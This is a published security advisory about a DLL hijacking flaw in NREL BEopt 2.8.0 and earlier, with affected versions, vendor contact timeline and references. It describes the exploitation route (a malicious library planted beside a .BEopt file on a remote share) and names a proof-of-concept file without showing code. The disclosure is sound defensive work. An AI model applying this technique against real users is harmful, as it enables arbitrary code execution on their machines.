NREL BEopt 2.8.0 Insecure Library Loading Arbitrary Code Execution

Title: NREL BEopt 2.8.0 Insecure Library Loading Arbitrary Code Execution
Advisory ID: ZSL-2019-5513
Type: Remote/Local
Impact: System Access
Risk: (4/5)
Release Date: 09.03.2019
Summary
The BEopt™ (Building Energy Optimization Tool) software provides capabilities to evaluate residential building designs and identify cost-optimal efficiency packages at various levels of whole-house energy savings along the path to zero net energy.
Description
BEopt suffers from a DLL Hijacking issue. The vulnerability is caused due to the application loading libraries (sdl2.dll and libegl.dll) in an insecure manner. This can be exploited to load arbitrary libraries by tricking a user into opening a related application file .BEopt located on a remote WebDAV or SMB share.
Vendor
NREL - https://beopt.nrel.gov
Affected Version
2.8.0.0
2.7.0.0
2.6.0.1
Tested On
Microsoft Windows 7 Ultimate SP1 (EN)
Vendor Status
[06.02.2019] Vulnerability discovered.
[08.02.2019] Vendor contacted.
[08.02.2019] Vendor responds asking more details.
[09.02.2019] Sent details to the vendor.
[18.02.2019] No response from the vendor.
[19.02.2019] Asked vendor for status update.
[08.03.2019] No response from the vendor.
[09.03.2019] Public security advisory released.
PoC
beopt_dllhijack.c
Credits
Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>
References
[1] https://packetstormsecurity.com/files/152043
[2] https://cxsecurity.com/issue/WLB-2019030108
[3] https://exchange.xforce.ibmcloud.com/vulnerabilities/158065
Changelog
[09.03.2019] - Initial release
[12.03.2019] - Added reference [1]
[13.03.2019] - Added reference [2]
[17.03.2019] - Added reference [3]
Contact
Zero Science Lab

Web: http://www.zeroscience.mk
e-mail: lab@zeroscience.mk